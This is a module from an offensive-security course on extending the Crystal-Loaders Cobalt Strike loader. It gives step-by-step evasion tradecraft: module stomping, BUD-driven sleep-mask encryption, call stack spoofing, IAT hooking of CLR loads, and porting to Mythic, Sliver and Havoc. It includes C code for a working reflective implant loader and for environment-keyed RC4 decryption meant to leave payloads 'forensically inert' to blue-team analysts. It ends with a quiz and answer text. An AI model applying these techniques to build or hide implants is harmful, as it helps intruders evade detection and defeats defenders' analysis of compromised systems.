Module 8: Extending Crystal-Loaders
The adaptation guide — module stomping, sleep mask integration, call stack spoofing, IAT hooking PICOs, guardrailed loaders, custom DFR resolvers, and porting the architecture beyond Cobalt Strike.
Module Objective
Crystal-Loaders is a proof of concept. As rasta-mouse stated, it demonstrates the Beacon User Data (BUD) contract and Crystal Palace integration; it is not a production-ready implant. This module maps the extension points that Crystal-Loaders deliberately leaves open. By the end, you will understand seven concrete extension paths, the data structures each one touches, and the detection trade-offs each extension addresses.
1. What Crystal-Loaders Leaves on the Table
Crystal-Loaders is deliberately minimal. It proves the spec-driven PIC architecture works, but it ships without several capabilities that a production-grade loader would need. Each omission is an extension opportunity:
| Capability | Current Status | Extension Opportunity |
|---|---|---|
| Module stomping / overloading | Uses VirtualAlloc → private commit | File-backed MEM_IMAGE memory |
| Sleep mask | BUD tracking is set up but no sleep mask PIC is included | BUD-aware encrypt/decrypt cycle |
| Call stack spoofing | Not implemented | Draugr / ThreadStackSpoofer integration |
| IAT hooking PICO | No post-exploitation API interception | Hook loaded DLL IATs via Crystal Palace PICO |
| Guardrailing | Environment-locked decryption not included | Payload only decrypts on the correct target |
| Custom DFR resolvers | Default ROR13 + string resolution | Alternative hash algorithms, LdrLoadDll fallback |
| ETW / AMSI bypass | Not addressed | Patch or unhook telemetry providers |
| PE header cleanup | Beacon PE headers persist after load | Zero headers post-load to evade memory scanners |
The rest of this module walks through six of these extensions in detail, plus a seventh (porting the architecture beyond Cobalt Strike), showing what structures to modify, what code to change, and what detection vectors each extension addresses.
2. Extension 1 — Module Stomping
The single biggest detection surface in Crystal-Loaders today is that Beacon lives in private-commit executable memory allocated via VirtualAlloc. Tools like Moneta and pe-sieve specifically scan for MEM_PRIVATE + PAGE_EXECUTE* regions. Module stomping (also called module overloading) eliminates this by placing Beacon in file-backed MEM_IMAGE memory.
The Concept
Module Stomping Flow: DLL on disk → section created with SEC_IMAGE → MEM_IMAGE view overwritten with Beacon → file-backed memory
- Instead of VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE), open a legitimate but unused DLL on disk.
- Use NtCreateSection with the SEC_IMAGE flag to create a file-backed image section object from it.
- Map the section into the process with NtMapViewOfSection.
- Overwrite the legitimate DLL's sections with Beacon's sections.
- The result: Beacon lives in MEM_IMAGE (file-backed) memory, defeating Moneta and pe-sieve's private-commit detection.
Code Changes to go()
C (Conceptual Diff)
// Before (current Crystal-Loaders)
PBYTE dst = KERNEL32$VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// After (module stomping)
// 1. Find a suitable sacrificial DLL (not loaded, large enough)
// 2. NtCreateSection with SEC_IMAGE
// 3. NtMapViewOfSection
// 4. Copy sections over the mapped DLL
Updating ALLOCATED_MEMORY
The BUD ALLOCATED_MEMORY structure tracks how each region was allocated. When switching to module stomping, you must update the allocation method so the sleep mask and other BUD consumers know they are dealing with file-backed memory:
C
// Use METHOD_MODULESTOMP instead of METHOD_VIRTUALALLOC
region->CleanupInformation.AllocationMethod = METHOD_MODULESTOMP;
// or METHOD_NTMAPVIEW if using NtMapViewOfSection directly
The MODULESTOMP_INFO Structure
Beacon's beacon.h defines a structure for tracking module-stomped allocations:
C (beacon.h)
typedef struct _MODULESTOMP_INFO {
HMODULE ModuleHandle;
} MODULESTOMP_INFO, *PMODULESTOMP_INFO;
This structure simply stores the module handle of the stomped DLL. BUD consumers (especially the sleep mask and cleanup routines) use the ModuleHandle to identify which loaded module was overwritten, enabling proper cleanup (e.g., unmapping the view) when the implant exits or the region is freed.
Sacrificial DLL Selection
The sacrificial DLL must meet two criteria: it must not already be loaded in the process (to avoid conflicts), and it must be large enough to contain the Beacon payload. Common choices include DLLs in C:\Windows\System32 that are large but rarely loaded, such as xpsservices.dll or dbghelp.dll. Choosing a DLL whose SizeOfImage closely matches Beacon's size reduces the amount of unused mapped memory, which itself can be a detection heuristic.
3. Extension 2 — Sleep Mask Integration
Crystal-Loaders populates the ALLOCATED_MEMORY structure with section-level tracking, but it does not include a sleep mask. A sleep mask PIC would use this BUD data to encrypt Beacon's memory sections during sleep and decrypt them before the next check-in.
The Sleep Mask Cycle
BUD-Aware Sleep Mask Flow
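- Read ALLOCATED_MEMORY from BUD and enumerate all tracked regions and sections.
- For each section with MaskSection == TRUE, change permissions to RW via NtProtectVirtualMemory.
- Encrypt the section contents (e.g., with SystemFunction032).
- Sleep (CreateTimerQueueTimer or a waitable timer).
- Decrypt the sections and restore their original permissions before the next check-in.
Conceptual Implementation Using BUD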
C (Sleep Mask - BUD Integration)
// Conceptual sleep mask flow using BUD's ALLOCATED_MEMORY
for (int r = 0; r < 6; r++) {
ALLOCATED_MEMORY_REGION * region = &bud->allocatedMemory->AllocatedMemoryRegions[r];
if (region->Purpose == PURPOSE_EMPTY) continue;
for (int s = 0; s < 8; s++) {
ALLOCATED_MEMORY_SECTION * sec = &region->Sections[s];
if (!sec->MaskSection || sec->VirtualSize == 0) continue;
// Change to RW so we can encrypt in place
DWORD oldProtect;
NtProtectVirtualMemory(
NtCurrentProcess(),
&sec->BaseAddress,
&sec->VirtualSize,
PAGE_READWRITE,
&oldProtect
);
// Encrypt the section contents
xor_encrypt(sec->BaseAddress, sec->VirtualSize, key);
}
}
The Ekko-Style Timer Queue Pattern
The Ekko sleep obfuscation technique uses CreateTimerQueueTimer to queue ROP-style callbacks that change memory permissions, encrypt, sleep, decrypt, and restore — all without the Beacon thread being active during the sleep window. Adapting Ekko for BUD means replacing Ekko's hardcoded memory ranges with the ALLOCATED_MEMORY regions tracked by BUD.
Why BUD Makes This Easier
Without BUD, a sleep mask must discover Beacon's memory layout at runtime — scanning the VAD, searching for PE headers, or using hardcoded offsets. BUD provides the exact base address, size, and permissions of every section in a structured array. The sleep mask just iterates the array. This is the design intent behind ALLOCATED_MEMORY — it is the contract between the loader and the sleep mask.
4. Extension 3 — Call Stack Spoofing
Even with LibGate's indirect syscalls routing execution through ntdll, the return stack still reveals that the calling code lives in private memory. A full call stack walk shows:
Call Stack (Anomalous)
ntdll!NtAllocateVirtualMemory (syscall;ret gadget)
→ returns to 0x00007FF6`1A3C0842 ← loader PIC blob (PRIVATE memory!)
→ returns to 0x00007FF6`1A3C0210 ← still in PIC blob
→ ...
The return addresses in private memory are the anomaly. EDR stack walkers flag any frame that falls outside a file-backed module.
The Draugr Approach
The Draugr technique (covered in a separate course) creates synthetic stack frames that make the call stack look like it originates from legitimate system code. It uses JMP [RBX] gadget chaining with fake RUNTIME_FUNCTION and UNWIND_INFO structures so that the Windows unwinder produces a clean, believable stack trace.
The ThreadStackSpoofer Approach
A simpler alternative: before entering sleep, overwrite the return addresses on the current thread's stack with pointers into legitimate modules. On wake, restore the real return addresses. This defeats point-in-time stack scans during the sleep window.
Integration via Crystal Palace PICO
Crystal Kit demonstrated call stack spoofing as a PICO merged via Crystal Palace. The integration approach:
Call Stack Spoofing PICO Integration: the spoofing PICO is merged into the loader with the mergelib directive.
Why This Is a PICO and Not Part of the Loader
Call stack spoofing is orthogonal to the loading process. It applies to every API call Beacon makes after loading, not just the loading phase. By packaging it as a PICO merged via mergelib, the spoofing logic is composable — you can include it or omit it per-spec without modifying the loader code itself.
5. Extension 4 — IAT Hooking PICO
Crystal Kit's most sophisticated extension was an IAT hooking PICO that intercepts specific API calls Beacon makes through its import address table. This operates during and after the ProcessImports phase of LibTCG.
How It Works
- During LoadDLL/ProcessImports, the PICO hooks the loaded DLL's IAT entries by replacing function pointers with addresses inside the PIC blob.
- The PIC blob intercepts the call, adds evasion (call stack spoofing, argument sanitization), and then forwards it to the real API.
- The hooking is invisible to Beacon — it calls APIs normally through its IAT, unaware that they are being intercepted.
Key Hook Targets
| Target API | Beacon Commands Affected | Evasion Purpose |
|---|---|---|
| CreateProcessA/W | shell, run, powerpick | Wrap with call stack spoofing for child process creation |
| LoadLibraryA/W | CLR/PowerShell commands | Intercept loads of clr.dll, System.Management.Automation.dll |
The LoadLibraryA/W hook is particularly important. When Beacon executes powerpick or execute-assembly, Windows loads the CLR and PowerShell automation DLLs. EDR products monitor for these loads (via PsSetLoadImageNotifyRoutine) as they strongly indicate offensive tooling. An IAT hook can intercept these loads and apply additional obfuscation or timing manipulation.
Complexity Warning
IAT hooking PICOs are the most complex extension on this list. The PIC blob must maintain its own trampolines for every hooked function, handle calling convention preservation, and ensure thread safety. Incorrect hooking can crash the Beacon process or produce unpredictable behavior. This is an advanced technique that requires deep understanding of x64 calling conventions and IAT structure.
6. Extension 5 — Guardrailed Loaders
Guardrailing ensures that a captured payload is useless outside the target environment. The Tradecraft Garden includes a simple_rdll_guardrail example demonstrating this concept, though Crystal-Loaders itself does not implement guardrailing. The full guardrail pattern works as follows:
The Guardrail Flow
Environment-Locked Payload Decryption
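- Derive a key from the host environment (e.g., the C: volume serial via GetVolumeInformationA("c:\\")).
- Decrypt the payload with SystemFunction033 using the derived key.
- On the wrong host, decryption yields garbage and the loader exits without producing Beacon.
Implementation (simple_rdll_guardrail pattern)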
The simple_rdll_guardrail example in the Tradecraft Garden derives its key from the target machine's C: drive volume serial number and uses RC4 encryption via the undocumented SystemFunction033 export from advapi32.dll:
C (Link Time - Operator Workstation)
// Obtain the target's C: volume serial (from recon)
DWORD targetSerial = ...; // e.g., 0xABCD1234
// Encrypt the Beacon DLL with RC4 using the serial as key material
RC4_Encrypt(beacon, beaconSize, &targetSerial, sizeof(DWORD));
C (Runtime - Target Host)
// Re-derive the key from the current host's C: volume serial
DWORD volumeSerial = 0;
GetVolumeInformationA("c:\\", NULL, 0, &volumeSerial, NULL, NULL, NULL, 0);
// Decrypt via SystemFunction033 (RC4)
USTRING data = { beaconSize, beaconSize, encrypted };
USTRING key = { sizeof(DWORD), sizeof(DWORD), (PBYTE)&volumeSerial };
SystemFunction033(&data, &key);
// If wrong host: volumeSerial differs → RC4 produces garbage
// No valid PE signature → ParseDLL fails → loader exits cleanly
// No crash, no IOCs, no Beacon artifacts for blue team to analyze
Blue Team Impact
The critical benefit of guardrailing is not that it prevents execution — it prevents analysis. When a blue team captures a guardrailed payload and attempts to detonate it in a sandbox or reverse-engineer it on an analyst workstation, they get garbage. The Beacon DLL never materializes. There are no strings to extract, no configuration to decode, no C2 addresses to block. The payload is forensically inert outside the target environment.
7. Extension 6 — Custom DFR Resolvers
Crystal Palace's Dynamic Function Resolution system supports multiple resolver strategies. The spec file controls which strategy applies to which modules. The default Crystal-Loaders configuration uses ROR13 hashing, but the DFR system is designed to be customizable.
The Dual-Resolver Pattern
From rasta-mouse's "Arranging the PIC Parterre" blog post, the recommended pattern uses two resolvers:
Crystal Palace Spec
dfr "resolve_explicit" "ror13" "KERNEL32, NTDLL"
dfr "resolve_default" "strings"
| Resolver | Behavior | Use Case |
|---|---|---|
| resolve_explicit | Only walks already-loaded modules (EAT parsing). Never calls LoadLibrary. | KERNEL32 and NTDLL — guaranteed to be loaded in every process |
| resolve_default | Falls back to LoadLibraryA for modules not yet loaded. | All other DLLs that Beacon might need at runtime |
Advanced Resolver Modifications
- Substitute LdrLoadDll for LoadLibraryA: LoadLibraryA (kernel32) is commonly hooked by EDRs. Calling LdrLoadDll (ntdll) directly bypasses kernel32 hooks while achieving the same result.
- Custom hash algorithms: Replace ROR13 with CRC32, djb2, or a unique hash to avoid YARA rules that match known ROR13 hash constants (e.g., 0x3CFA685D, defined as NTDLL_HASH in Crystal-Loaders' loader.c).
- Proxy through threadpool: Route API calls through TpAllocWork/TpPostWork/TpReleaseWork threadpool work items. The call stack then shows the Windows threadpool infrastructure rather than direct calls from the PIC blob.
Resolver Security Trade-Off
The explicit resolver is stealthier because it never triggers a PsSetLoadImageNotifyRoutine callback — it only reads modules already in the PEB. The default (LoadLibrary-based) resolver is more flexible but generates image load events that EDRs monitor. A well-designed loader uses explicit resolution for everything it can and only falls back to default for genuinely unloaded dependencies.
8. Extension 7 — Porting Beyond Cobalt Strike
Crystal Palace and the PIC architecture are not Cobalt Strike-specific. The core value — spec-driven PIC generation, LibTCG PE loading, LibGate indirect syscalls, DFR — is C2-framework agnostic. The Cobalt Strike coupling comes from only a few interfaces.
What You Would Need to Change
| CS-Specific Component | What to Remove / Replace |
|---|---|
| beacon.h BUD structures | Create equivalent data-passing structures for your C2, or remove BUD entirely if not needed |
| Three-call DllMain protocol | Remove the DLL_BEACON_USER_DATA, DLL_PROCESS_ATTACH, DLL_BEACON_START sequence |
| Aggressor .cna hooks | Replace with your C2's operator scripting interface (if any) |
| Post-Ex UDRL references | Adapt or remove post-exploitation loader if your C2 does not use child payload loading |
Potential Targets
- Mythic agents — Mythic's payload generation is already modular; Crystal Palace PIC output can be wrapped in a Mythic payload type
- Sliver implants — Sliver uses shellcode stagers; the PIC blob can serve as the shellcode payload
- Havoc agents — Havoc's Demon agent uses UDRL-style loading that maps directly to Crystal Palace concepts
- Custom C2 frameworks — Any framework that accepts shellcode or reflective DLL input
- Standalone shellcode runners — Use the PIC blob as a generic payload without any C2 framework
A Minimal Generic Loader
Stripped of all Cobalt Strike specifics, a Crystal Palace loader reduces to this core:
C (Generic Loader)
void go(void)
{
// Get the embedded DLL and XOR key from the PIC's resource section
PRESOURCE dll = GETRESOURCE(_DLL_);
PRESOURCE key = GETRESOURCE(_KEY_);
// XOR unmask the embedded payload
PBYTE buf = VirtualAlloc(NULL, dll->length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
for (DWORD i = 0; i < dll->length; i++)
buf[i] = dll->data[i] ^ key->data[i % key->length];
// Parse and load the DLL using LibTCG
DLLDATA dlldata;
ParseDLL(buf, &dlldata);
PBYTE dst = VirtualAlloc(NULL, SizeOfDLL(&dlldata), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
LoadDLL(&dlldata, dst);
ProcessImports(&dlldata, dst);
FixSectionPermissions(&dlldata, dst);
// Simple: just call DllMain directly
DLLMAIN_FUNC entry = (DLLMAIN_FUNC)EntryPoint(&dlldata, dst);
VirtualFree(buf, 0, MEM_RELEASE);
entry(dst, DLL_PROCESS_ATTACH, NULL);
}
This is the entire loading pipeline without BUD, without the three-call protocol, and without Aggressor integration. LibTCG, LibGate, and DFR all still function — only the Cobalt Strike handshake is removed. You can then add back whatever data-passing contract your C2 agent expects.
The Core Portable Components
| Component | Function | CS Dependency |
|---|---|---|
| Crystal Palace linker | Compiles COFF → PIC shellcode | None |
| LibTCG | PE parsing, loading, imports, relocations | None |
| LibGate | Indirect syscall execution | None |
| DFR | Dynamic function resolution (API references rewritten at link time, resolved at runtime) | None |
| mergelib / PICOs | Composable PIC module merging | None |
| BUD | Loader → agent data contract | CS-specific structures |
| Three-call DllMain | Agent initialization protocol | CS-specific protocol |
9. Detection & OPSEC Considerations
This table summarizes the detection posture of Crystal-Loaders in its current PoC state versus what becomes possible with the extensions described in this module:
| Detection Vector | Current Crystal-Loaders | With Extensions |
|---|---|---|
| Private-commit executable memory | Vulnerable — uses VirtualAlloc | Module stomping → file-backed MEM_IMAGE |
| PE headers in memory | Minimal — PIC blob has no PE headers, but loaded Beacon does | Header erasure post-load |
| RWX memory | Avoids — uses RW then RX per section | Same |
| Return address in private memory | LibGate indirect syscalls help (ntdll frame present) | Call stack spoofing eliminates anomalous frames |
| YARA on ROR13 constants | NTDLL_HASH (0x3CFA685D, from loader.c) visible in PIC | Custom hash algorithm obfuscates constants |
| ETW syscall telemetry | Kernel-level — cannot bypass from userland | N/A — kernel telemetry remains |
| Behavioral analysis | VirtualAlloc + VirtualProtect patterns | Module stomping changes the pattern entirely |
| Sleep mask detection | No sleep mask included | BUD-aware sleep mask encrypts during sleep |
| CLR / PowerShell image loads | Not addressed | IAT hooking PICO can intercept and obfuscate |
No Silver Bullet
Even with every extension implemented, certain detection vectors remain. Kernel-level ETW telemetry (such as the Threat Intelligence provider) is generated inside the kernel, so it still records the operations it covers no matter how the syscall was invoked from user mode. Behavioral analysis can correlate process creation patterns, network traffic, and named pipe usage. Memory scanners are evolving to detect module stomping by comparing mapped sections against the on-disk DLL. The goal of these extensions is not permanent invisibility; it is to raise the cost of detection high enough that automated tools miss the implant, forcing defenders into expensive manual analysis.
10. Module Summary
Key Takeaways
- Crystal-Loaders is a PoC, not a production loader. Its value is demonstrating the architecture, not shipping a finished product.
- Module stomping replaces VirtualAlloc with file-backed MEM_IMAGE memory, eliminating the single biggest detection surface.
- Sleep mask integration leverages BUD's ALLOCATED_MEMORY to encrypt Beacon sections during sleep without runtime memory discovery.
- Call stack spoofing (Draugr/ThreadStackSpoofer) eliminates anomalous return addresses in private memory, packaged as a composable PICO.
- IAT hooking PICOs intercept Beacon API calls to add per-call evasion (stack spoofing, CLR load interception).
- Guardrailing ensures captured payloads are forensically inert outside the target environment.
- Custom DFR resolvers let you swap hash algorithms, avoid LoadLibrary hooks, and proxy through threadpool infrastructure.
- Porting beyond Cobalt Strike requires replacing only the Cobalt Strike-specific interfaces: BUD, the three-call DllMain protocol, and the Aggressor hooks. The core PIC architecture (Crystal Palace, LibTCG, LibGate, DFR) is C2-agnostic.
Module 8 Quiz: Extending Crystal-Loaders
Q1: What allocation method should you use in ALLOCATED_MEMORY when implementing module stomping?
Q2: What is the primary benefit of guardrailed loaders?
Guardrailing prevents analysis outside the target environment. simple_rdll_guardrail derives its key from the C: drive volume serial number obtained via GetVolumeInformationA and decrypts the payload with RC4 via SystemFunction033. If the payload is captured and detonated in a sandbox or on an analyst workstation, the derived key will not match, and RC4 decryption produces garbage. The Beacon DLL never materializes, leaving no strings, configuration, or C2 addresses for blue team analysis. The payload is forensically inert outside the intended target.
Q3: What Crystal Palace feature makes the PIC architecture portable beyond Cobalt Strike?